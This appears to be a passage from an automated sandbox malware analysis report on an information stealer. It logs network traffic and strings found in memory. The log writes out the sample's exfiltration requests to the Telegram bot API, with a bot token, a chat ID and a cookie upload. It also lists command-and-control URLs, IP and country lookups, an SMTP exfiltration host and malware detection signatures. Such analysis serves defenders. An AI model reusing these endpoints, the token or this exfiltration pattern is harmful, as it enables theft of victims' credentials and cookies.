Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/03/2025%20/%2014:39:37%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendDocument?chat_id=5013849544&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd5ed1ba658e39 Host: api.telegram.org Content-Length: 742 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/03/2025%20/%2016:44:55%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendDocument?chat_id=5013849544&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd5f05fec35142 Host: api.telegram.org Content-Length: 742 Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View IP Address: 118.69.190.131 118.69.190.131
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49694 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49687 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49685 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49684 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49692 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49689 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49701 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49705 -> 104.21.64.1:443
Source: global traffic TCP traffic: 192.168.2.8:49722 -> 118.69.190.131:587
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49683 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49690 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/03/2025%20/%2014:39:37%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/03/2025%20/%2016:44:55%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
              Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
              Source: global traffic | DNS traffic detected: DNS query: mail.vvtrade.vn
              Source: unknown | HTTP traffic detected: POST /bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendDocument?chat_id=5013849544&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd5ed1ba658e39 | Host: api.telegram.org | Content-Length: 742 | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 07 Mar 2025 14:51:07 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 07 Mar 2025 14:51:19 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: RegSvcs.exe, 00000003.00000002.3307241932.0000000000434000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003440000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CB0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003450000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003450000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.orgd
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3307241932.0000000000434000.00000040.80000000.00040000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
              Source: RegSvcs.exe, 00000006.00000002.3308619299.0000000000EEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsG
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003440000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CB0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.vvtrade.vn
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003440000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CB0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.vvtrade.vnd
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003450000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
              Source: RegSvcs.exe, 00000006.00000002.3309591385.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a
              Source: RegSvcs.exe, 00000006.00000002.3309591385.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendDocument?chat_id=5013
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: RegSvcs.exe, 00000003.00000002.3312006206.000000000456F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3312006206.0000000004535000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: RegSvcs.exe, 00000003.00000002.3312006206.000000000456F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3312006206.0000000004535000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: RegSvcs.exe, 00000006.00000002.3309591385.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002C45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: RegSvcs.exe, 00000003.00000002.3309658145.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlBDr
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: RegSvcs.exe, 00000003.00000002.3312006206.000000000456F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3312006206.0000000004535000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
              Source: RegSvcs.exe, 00000003.00000002.3309658145.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002B81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3307241932.0000000000434000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002B11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 00000006.00000002.3309591385.0000000002B81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: RegSvcs.exe, 00000003.00000002.3309658145.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002B81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: RegSvcs.exe, 00000003.00000002.3312006206.000000000456F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3312006206.0000000004535000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20w
              Source: RegSvcs.exe, 00000003.00000002.3312006206.000000000456F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3312006206.0000000004535000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: RegSvcs.exe, 00000006.00000002.3309591385.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002C76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003410000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002C80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lBDr
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49689
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49686
              Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49684
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49686 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49684 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49692
              Source: unknown | Network traffic detected: HTTP traffic on port 49692 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49689 -> 443
